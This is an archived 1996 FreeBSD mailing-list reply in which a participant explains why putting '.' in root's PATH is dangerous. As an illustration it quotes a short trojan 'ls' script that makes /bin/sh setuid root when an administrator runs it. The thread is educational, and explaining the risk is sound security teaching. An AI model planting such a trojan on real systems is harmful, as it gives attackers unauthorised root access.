Skip site navigation (1)Skip section navigation (2)
Date:      Tue, 25 Jun 1996 00:33:59 -0700 (PDT)
From:      -Vince- <vince@mercury.gaianet.net>
To:        "Michael L. VanLoon -- HeadCandy.com" <michaelv@HeadCandy.com>
Cc:        Mark Murray <mark@grumble.grondar.za>, hackers@freebsd.org, security@freebsd.org, Chad Shackley <chad@mercury.gaianet.net>, jbhunt <jbhunt@mercury.gaianet.net>
Subject:   Re: I need help on this one - please help me track this guy down! 
Message-ID:  <Pine.BSF.3.91.960625003302.21697j-100000@mercury.gaianet.net>
In-Reply-To: <199606250727.AAA24988@MindBender.HeadCandy.com>

next in thread | previous in thread | raw e-mail | index | archive | help
On Tue, 25 Jun 1996, Michael L. VanLoon -- HeadCandy.com wrote:

> 
> >> 2) The Cracker made a trojan script somewhere (usually exploiting
> >>    some admins (roots) who have "." in their path). This way he creates
> >>    a script that when run as root will make him a suid program.
> >>    after this he has you by tender bits.
> 
> >	Hmmm, doesn't everyone have . as their path since all . does is allow
> >someone to run stuff from the current directory...
> 
> Assume root has "." in its path.  Hacker puts this little script in
> his dir, maybe also in /tmp/; it's called "ls" (imagine the
> coincidence), and it's executable by all:
> 
> 	#!/bin/sh
> 	chown root /bin/sh > /dev/null 2>&1
> 	chmod u+s,a+x /bin/sh > /dev/null 2>&1
> 	ls $\*
> 
> Then sits back and waits for the sysadmin to come along and type "ls"
> in one of those directories.
> 
> Pop quiz: what is the result?

	Never thought about that one....  

Vince




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.91.960625003302.21697j-100000>